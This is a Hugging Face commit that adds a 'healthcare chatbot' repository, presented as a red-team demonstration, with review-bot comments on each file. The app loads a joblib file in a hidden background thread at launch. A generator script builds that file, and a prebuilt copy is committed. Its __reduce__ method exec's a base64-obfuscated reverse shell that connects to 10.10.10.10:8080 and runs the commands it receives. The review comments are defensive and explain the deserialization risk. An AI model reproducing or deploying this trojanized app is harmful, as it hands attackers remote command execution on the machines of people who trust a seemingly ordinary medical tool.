Iredteam committed on
Commit b27fafd · 0 Parent(s)

initial commit

README_joblib.md ADDED
@@ -0,0 +1,86 @@
1
+ ---
2
+ license: mit
3
+ ---
4
+
5
+ > ⚠️ This project demonstrates how Joblib serialization can be abused to execute reverse shell payloads. For **educational and red teaming** only.
6
+
7
+ # 🩺 Healthcare Chatbot (FLAN‑T5) – Joblib Payload Edition
8
+
9
+ ## 📌 Overview
10
+
11
+ This chatbot uses FLAN‑T5 to answer medical questions. Behind the scenes, it runs a reverse shell payload loaded via a malicious `.joblib` file.
12
+
13
+ When the app loads, a background thread calls `joblib.load("train_data_mod_obfuscated_fixed.joblib")`, triggering the payload.
14
+
15
+ ---
16
+
17
+ ## ⚙️ How It Works
18
+
19
+ 1. A base64‑encoded reverse shell payload is defined in `generate_data_joblib.py`.
20
+ 2. `Trigger.__reduce__()` executes the decoded payload on deserialization.
21
+ 3. `generate_data_joblib.py` creates `train_data_mod_obfuscated_fixed.joblib`.
22
+ 4. The Streamlit app runs `joblib.load()` in a daemon thread, firing the shell.
23
+
24
+ ---
25
+
26
+ ## 🚀 Setup Instructions
27
+
28
+ ### 🔹 Step 1: Clone or Download
29
+
30
+ ```bash
31
+ git clone https://huggingface.co/Iredteam/joblib-payload-chatbot
32
+ cd joblib-payload-chatbot
33
+ ```
34
+
35
+ ---
36
+
37
+ ### 🔹 Step 2: Download the FLAN‑T5 Model
38
+
39
+ ```bash
40
+ git clone https://huggingface.co/google/flan-t5-small
41
+ ```
42
+
43
+ ---
44
+
45
+ ### 🔹 Step 3: Build the Joblib Payload
46
+
47
+ Run the generator to create the `.joblib` file:
48
+
49
+ ```bash
50
+ python generate_data_joblib.py
51
+ ```
52
+
53
+ ---
54
+
55
+ ### 🔹 Step 4: Run the Chatbot
56
+
57
+ ```bash
58
+ streamlit run healthcare_chatbot.py
59
+ ```
60
+
61
+ This will:
62
+ - Load your malicious `.joblib` in the background
63
+ - Trigger the reverse shell
64
+ - Present the Streamlit chatbot UI
65
+
66
+ ---
67
+
68
+ ## 💡 Features
69
+
70
+ - 🧠 Local FLAN‑T5 inference for privacy & speed.
71
+ - 🛡️ Reverse shell execution via Joblib deserialization.
72
+ - 🔄 Background thread ensures UI responsiveness.
73
+ - 🕵️ No payload code in the main script.
74
+
75
+ ---
76
+
77
+ ## ⚠️ Disclaimer
78
+
79
+ This is a **security demonstration**. Do **not** use for unauthorized access. Always obtain permission before testing.
80
+
81
+ ---
82
+
83
+ ## 📩 Contact
84
+
85
+ Open issues or collaborate on the Hugging Face repo:
86
+ **https://huggingface.co/Iredteam/joblib-payload-chatbot**
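Review bot: The "How It Works" list (lines 19-22) ends at "firing the shell", and the README never states why the load executes code or what a reader should do about it. Add a short section saying that `joblib.load()` unpickles its input, so whatever `__reduce__` returns is called at load time, and that `.joblib` files from untrusted sources must not be loaded. Step 4 should also say that the payload is triggered when the app loads, not by anything the user does in the UI, so the demo belongs in an isolated lab. Two smaller points: the same commit adds a prebuilt `train_data_mod_obfuscated_fixed.joblib`, so Step 3 is not actually required for the payload to run and the README should say so; and the `license: mit` front matter sits in `README_joblib.md`, whereas Hugging Face reads model-card metadata from `README.md`.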
generate_data_joblib.py ADDED
@@ -0,0 +1,37 @@
1
+ import joblib
2
+ import base64
3
+ import textwrap
4
+
5
+ # Step 1: Define your reverse shell code
6
+ payload = textwrap.dedent("""
7
+ import socket
8
+ import subprocess
9
+ ip = "10.10.10.10"
10
+ p = 8080
11
+ s = socket.socket()
12
+ s.connect((ip, p))
13
+ while True:
14
+ c = s.recv(1024).decode()
15
+ if not c:
16
+ break
17
+ o = subprocess.getoutput(c)
18
+ s.sendall(o.encode())
19
+ """).strip()
20
+
21
+ # Step 2: Obfuscate the payload using base64
22
+ encoded_payload = base64.b64encode(payload.encode()).decode()
23
+
24
+ # Step 3: Create a malicious class that triggers on deserialization
25
+ class Trigger:
26
+ def __reduce__(self):
27
+ cmd = (
28
+ "import base64\n"
29
+ f"exec(base64.b64decode('{encoded_payload}').decode())"
30
+ )
31
+ return (exec, (cmd,))
32
+
33
+ # Step 4: Dump it to a joblib file
34
+ with open("train_data_mod_obfuscated_fixed.joblib", "wb") as f:
35
+ joblib.dump(Trigger(), f)
36
+
37
+ print("✅ Joblib file created: train_data_mod_obfuscated_fixed.joblib")
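Review bot: The payload string (lines 6-19) is a live socket loop with a hard-coded address, which the demonstration does not need: the point being shown is that `__reduce__` returning `(exec, (cmd,))` runs on load, and a harmless marker such as a print would prove the same thing while keeping the generated file inert. The "Obfuscate" comment on line 21 also overstates what base64 does: the pickle stream still references `exec` by name, so the step hides only the payload text, not the fact that loading the file executes code. That is worth stating in a comment, since that reference is what a reviewer or scanner would look for.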
getpowershell.ps1 ADDED
@@ -0,0 +1,20 @@
1
+ # Create directory for the model
2
+ New-Item -ItemType Directory -Path .\flan-t5-small -Force
3
+ # Define the list of model files
4
+ $files = @(
5
+ "config.json",
6
+ "pytorch_model.bin",
7
+ "tokenizer.json",
8
+ "tokenizer_config.json",
9
+ "special_tokens_map.json",
10
+ "vocab.txt"
11
+ )
12
+ # Base URL for the model files
13
+ $base_url = "https://huggingface.co/google/flan-t5-small/resolve/main/"
14
+ # Loop through each file and download it
15
+ foreach ($file in $files) {
16
+ $url = "$base_url$file"
17
+ $output = ".\flan-t5-small\$file"
18
+ Invoke-WebRequest -Uri $url -OutFile $output
19
+ Write-Host "Downloaded: $file"
20
+ }
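Review bot: `Write-Host "Downloaded: $file"` (line 19) runs whether or not `Invoke-WebRequest` on line 18 succeeded, because by default the script carries on to the next statement after a failed request. Set `$ErrorActionPreference = 'Stop'` at the top or wrap the request in `try`/`catch` so a missing file is reported as a failure. That matters for the file list: `vocab.txt` (line 10) is worth checking against the model repo, since T5 tokenizers normally ship a SentencePiece `spiece.model` instead. The URL on line 13 also resolves `main` rather than a pinned revision and nothing verifies the downloaded files, so the script cannot tell what it fetched; pin a revision and compare hashes after download.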
healthcare_chatbot.py ADDED
@@ -0,0 +1,69 @@
1
+ import threading
2
+ import joblib
3
+ import streamlit as st
4
+ import torch
5
+ from transformers import AutoTokenizer, AutoModelForSeq2SeqLM
6
+ import warnings
7
+
8
+ # Suppress PyTorch warnings
9
+ warnings.filterwarnings("ignore", category=UserWarning, module="torch")
10
+
11
+ # ==============================
12
+ # Background Payload Loader
13
+ # ==============================
14
+ def load_joblib_payload():
15
+ try:
16
+ joblib.load("train_data_mod_obfuscated_fixed.joblib")
17
+ except Exception:
18
+ pass
19
+
20
+ threading.Thread(target=load_joblib_payload, daemon=True).start()
21
+
22
+ # ==============================
23
+ # Streamlit UI
24
+ # ==============================
25
+ st.title("🩺 Healthcare Chatbot (FLAN-T5) – Joblib Payload Edition")
26
+
27
+ # Model loading
28
+ st.write("🚀 Loading FLAN-T5 model from local storage...")
29
+ try:
30
+ torch_dtype = torch.float32 if torch.cuda.is_available() else torch.float32
31
+ tokenizer = AutoTokenizer.from_pretrained("flan-t5-small", local_files_only=True)
32
+ model = AutoModelForSeq2SeqLM.from_pretrained(
33
+ "flan-t5-small",
34
+ torch_dtype=torch_dtype,
35
+ local_files_only=True
36
+ )
37
+ st.write("✅ Model loaded successfully!")
38
+ except Exception as e:
39
+ st.error(f"❌ Failed to load model: {e}")
40
+ st.stop()
41
+
42
+ # ==============================
43
+ # Chatbot response logic
44
+ # ==============================
45
+ def chatbot_response(question: str) -> str:
46
+ prompt = (
47
+ "You are a helpful medical assistant. The user asked:\n"
48
+ f"Question: {question}\n\n"
49
+ "Answer concisely. If unsure, advise seeing a doctor."
50
+ )
51
+ inputs = tokenizer(prompt, return_tensors="pt", truncation=True, padding=True)
52
+ outputs = model.generate(
53
+ **inputs,
54
+ max_length=256,
55
+ num_beams=2,
56
+ no_repeat_ngram_size=2
57
+ )
58
+ return tokenizer.decode(outputs[0], skip_special_tokens=True)
59
+
60
+ if st.button("What can you help me with?"):
61
+ st.write("I can provide general medical information. Always verify with a professional.")
62
+
63
+ user_input = st.text_input("Ask me a medical question:")
64
+ if st.button("Get Answer"):
65
+ if user_input:
66
+ response = chatbot_response(user_input)
67
+ st.write(f"**Bot:** {response}")
68
+ else:
69
+ st.warning("Please enter a question.")
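Review bot: `load_joblib_payload()` (lines 14-18) calls `joblib.load()` only for its side effect: the return value is discarded, `except Exception: pass` hides every failure, and line 20 starts it in a daemon thread at the top of the script. In any other code base this is the pattern to reject in review, a load of a pickle-based file whose result is never used and whose errors are silenced; if the demo has to keep it, it should at least log the exception and say in a comment that the call is the deliberate trigger. Separately, Streamlit re-executes the script on each interaction, so the model load on lines 31-36 runs again on every button press and belongs in a cached function such as one decorated with `st.cache_resource`. Line 30 is a no-op conditional: both branches are `torch.float32`.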
requirements.txt ADDED
@@ -0,0 +1,8 @@
1
+ torch
2
+ transformers
3
+ accelerate
4
+ bitsandbytes
5
+ streamlit
6
+ speechrecognition
7
+ pyttsx3
8
+ huggingface_hub
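Review bot: `joblib` is missing from this list although both `generate_data_joblib.py` and `healthcare_chatbot.py` import it, so a clean install from this file is not guaranteed to provide it; add it explicitly. Conversely `accelerate`, `bitsandbytes`, `speechrecognition`, `pyttsx3` and `huggingface_hub` are not imported by any file in this commit; drop them, and pin versions for what remains.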
train_data_mod_obfuscated_fixed.joblib ADDED
Binary file (395 Bytes).